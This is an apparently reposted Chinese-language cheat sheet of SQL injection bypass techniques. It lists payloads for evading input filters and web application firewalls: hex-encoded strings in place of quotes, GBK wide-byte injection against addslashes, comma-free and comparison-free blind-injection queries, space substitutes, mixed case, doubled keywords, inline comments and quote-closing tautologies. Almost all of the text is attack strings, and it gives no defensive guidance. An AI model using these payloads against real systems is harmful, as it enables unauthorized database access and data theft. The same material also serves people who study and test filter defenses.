SQL注入常见绕过技巧

引号绕过

一、16进制绕过

会使用到引号的地方是在于最后的where子句中。如下面的一条sql语句，这条语句就是一个简单的用来查选得到users表中所有字段的一条语句。

select column_name  from information_schema.tables where table_name="users"

这个时候如果引号被过滤了，那么上面的where子句就无法使用了。那么遇到这样的问题就要使用十六进制来处理这个问题了。
users的十六进制的字符串是7573657273。那么最后的sql语句就变为了：

select column_name  from information_schema.tables where table_name=0x7573657273

二、宽字节注入

宽字节注入使用场景是后台使用了一些例如addslashes()的安全函数来对单引号，双引号和反斜线进行了转义，且编码是GBK的情况

?id=1%df' union select ...

GBK编码用两个字节来表示一个汉字。 的GBK编码为%5C，我们在输入时就可以加上一个%df与%5c组成一个汉字“運”，这样我们的单引号就逃出了限制

逗号绕过

在使用盲注的时候，需要使用到substring(),mid(),limit。这些子句方法都需要使用到逗号。对于substring()和mid()这两个方法可以使用from to的方式来解决：

select substr(database() from 1 for 1);
select mid(database() from 1 for 1);

对于limit可以使用offset来绕过：

select * from news limit 0,1
# 等价于下面这条SQL语句
select * from news limit 1 offset 0

比较符(<,>)绕过

同样是在使用盲注的时候，在使用二分查找的时候需要使用到比较操作符来进行查找。如果无法使用比较操作符，那么就需要使用到greatest来进行绕过了。
最常见的一个盲注的sql语句。

select * from users where id=1 and ascii(substr(database(),0,1))>64

此时如果比较操作符被过滤，上面的盲注语句则无法使用,那么就可以使用greatest来代替比较操作符了。greatest(n1,n2,n3,等)函数返回输入参数(n1,n2,n3,等)的最大值。
那么上面的这条sql语句可以使用greatest变为如下的子句:

select * from users where id=1 and greatest(ascii(substr(database(),0,1)),64)=64

空格绕过

空格绕过可以使用其他字符来代替空格

/**/  注释代替空格
()  括号绕过空格
编码 %a0,%0b
``(Tab上边的键)

实例

select/**/*from/**/users;
select(username)from(users);  # 注意：括号里不能有*
select%a0from%a0users;
select`*`from`users`;

随机大小写绕过

例如过滤select关键字：

SelECt * from users;

双写关键字绕过

适用于waf通过正则表达式将select等关键字过滤为空的情况

seleselectct * from users;

内联注释绕过

内联注释是把union、select等一些关键字放在/*!...*/里面来绕过waf检测

/*!select*/ * from users;

注释绕过

mysql的注释符号有：--空格、#、/**/

一些waf会将注释符号过滤，这时候可以用诸如and ‘1’ = ‘1来闭合SQL语句

# 引号闭合,$id传值 1' and '1'='1
select username,password from users where id = '$id'
#上面的sql语句变成了这样
select username,password from users where id ='1' and '1'='1'

and or关键字绕过

替换法

and ==> &&
or ==> ||

最后

以上就是正直秀发为你收集整理的SQL注入常见绕过技巧的全部内容，希望文章能够帮你解决SQL注入常见绕过技巧所遇到的程序开发问题。

如果觉得靠谱客网站的内容还不错，欢迎将靠谱客网站推荐给程序员好友。